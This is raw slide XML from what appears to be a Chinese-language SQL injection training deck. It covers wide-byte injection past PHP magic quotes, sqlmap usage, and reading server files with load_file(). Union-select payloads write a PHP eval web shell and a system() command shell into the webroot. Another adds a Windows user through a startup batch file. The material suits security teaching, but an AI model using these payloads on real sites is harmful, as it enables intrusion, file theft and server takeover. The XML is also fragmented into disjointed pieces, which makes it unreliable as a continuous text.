            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使其长度超过字段限制的长度，会自动截断，变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样相当于增加了个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理员账号密码。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宽字节注入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本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。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当打开时，所有的 '（单引号），"（双引号），\（反斜线）和 NULL 字符都会被自动加上一个反斜线进行转义。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这和 addslashes() 作用完全相同。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一共有三个魔术引号指令：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magic_quotes_gpc 影响到 HTTP 请求数据（GET，POST 和 COOKIE）。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不能在运行时改变。在 PHP 中默认值为 on。 参见 get_magic_quotes_gpc()。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magic_quotes_runtime 如果打开的话，大部份从外部来源取得数据并返回的函数，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包括从数据库和文本文件，所返回的数据都会被反斜线转义。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该选项可在运行的时改变，在 PHP 中的默认值为 off。 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参见 set_magic_quotes_runtime() 和 get_magic_quotes_runtime()。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magic_quotes_sybase 如果打开的话，将会使用单引号对单引号进行转义而非反斜线。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此选项会完全覆盖 magic_quotes_gpc。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如果同时打开两个选项的话，单引号将会被转义成 ''。而双引号、反斜线 和 NULL 字符将不会进行转义。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zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 如何取得其值参见 ini_get()。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宽字节注入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使用宽字节注入绕过魔术引号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只适用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%bf%27</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sqlmap.py -u “cracer.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--risk 3 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -p username --tamper unmagicquotes.py -v 3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4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Mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> 读写文件操作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 err="1">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>注入读写文件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err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该函数是用来读取源文件的函数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只能读取绝对路径的网页文件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在使用load_file()时应先找到网站绝对路径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例如：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d:/www/xx/index.php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/usr/src/apache/htdoc/index.php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注意：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1.路径符号 "\" 错误“\\”正确 “/” 正确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2.转换十六进制数，就不要‘’ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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获取根目录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报错显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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谷歌黑客	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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site:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目标网站 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>warning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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遗留文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> info test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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漏洞爆路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取配置文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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读取网站文件内容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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=2 union select 1,load_file('C:\\Inetpub\\wwwroot\\mysql-sql\\inc\\set_sql.php'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18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/>
              <a:t>将路径转换为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endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=2 union select 1,load_file(0x443A5C7068705C41504D53657276352E322E365C7777775C6874646F63735C335C636F6E6669672E706870),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>c:/windows/system32/inetsrv/metabase.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>iis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>配置文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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553085"/>
            <a:ext cx="10515600" cy="632460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写入函数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用的比较多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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=2 union select 1,"&lt;?php @eval($_POST['cracer']);?&gt;",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into outfile 'C:/Inetpub/wwwroot/mysql-sql/cracer.txt'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其他利用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第一种方法：需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>环境搭建需要系统权限才能执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill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 and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"net user seven 123 /add"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,2,3,4,5,6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> into outfile 'C://Documents and Settings/Administrator/「开始」菜单/程序/启动/1.bat'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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二种方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill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and 1=2 union select 1,"&lt;pre&gt;&lt;body&gt;&lt;?  @system($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>]); ?&gt;&lt;/body&gt;&lt;/pre&gt;",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into outfile 'C:/Inetpub/wwwroot/mysql-sql/cr.php'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> Mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>常规操作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0" y="553085"/>
            <a:ext cx="10515600" cy="632460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写入函数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用的比较多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面试问的特别多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写文件需要满足的权限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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、关闭魔术引号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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、找到根目录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--secure-file-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>允许导入路径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V="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="571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8950" y="2031365"/>
            <a:ext cx="8468995" cy="1905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67810" y="2840355"/>
            <a:ext cx="5627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Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> Mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入工具使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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注入工具的使用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萝卜头 穿山甲 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlmap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MySQL[1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一个关系型数据库管理系统，由瑞典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL AB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>公司开发，目前属于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>旗下公司。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最流行的关系型数据库管理系统，在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用方面 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是最好的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RDBMS (Relational Database Management System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，关系数据库管理系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用软件之一。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种关联数据库管理系统，关联数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所使用的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言是用于访问数据库的最常用标准化语言。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件采用了双授权政策（本词条“授权政策”），它分为社区版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型网站的开发都选择 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为网站数据库。由于其社区版的性能卓越，搭配 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可组成良好的开发环境。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905" lvl="0" indent="-1905">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 1、说明：创建数据库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CREATE DATABASE database-name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2、说明：删除数据库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drop database dbname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3、说明：创建新表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CREATE TABLE MYTABLE (name VARCHAR(20), sex CHAR(1));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4、查看数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>show databases;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插入数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>insert into admin(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) value ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin','admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from admin;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>更新修改数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>update admin set password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>adsdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' where id = 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>删除数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>delete from admin where id =1 ;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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402" y="0"/>
            <a:ext cx="6034405" cy="632460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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03" y="834189"/>
            <a:ext cx="11694092" cy="56147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2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1:system_user() 系统用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400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2:user()        用户名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905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3:current_user  当前用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400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sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4:session_user()连接数据库的用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400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5:database()    数据库名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905" lvl="0" indent="-1905"/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6:version()     MYSQL数据库版本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905" lvl="0" indent="-1905">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 7:load_file()  	转成16进制或者是10进制 MYSQL读取本地文件的函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400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sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8:@@datadir     读取数据库路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1905" lvl="0" indent="-1905"/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9:@@basedir    MYSQL 安装路径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因为获得了数据库路径，那么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apache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路径应该也在同级目录下，然后读取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apache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配置文件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etc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/httpd/conf/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httpd.conf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获取网站根目录，然后进行写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的操作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1905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10:@@version_compile_os   操作系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8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mid()---</a:t>
            </a:r>
            <a:r>
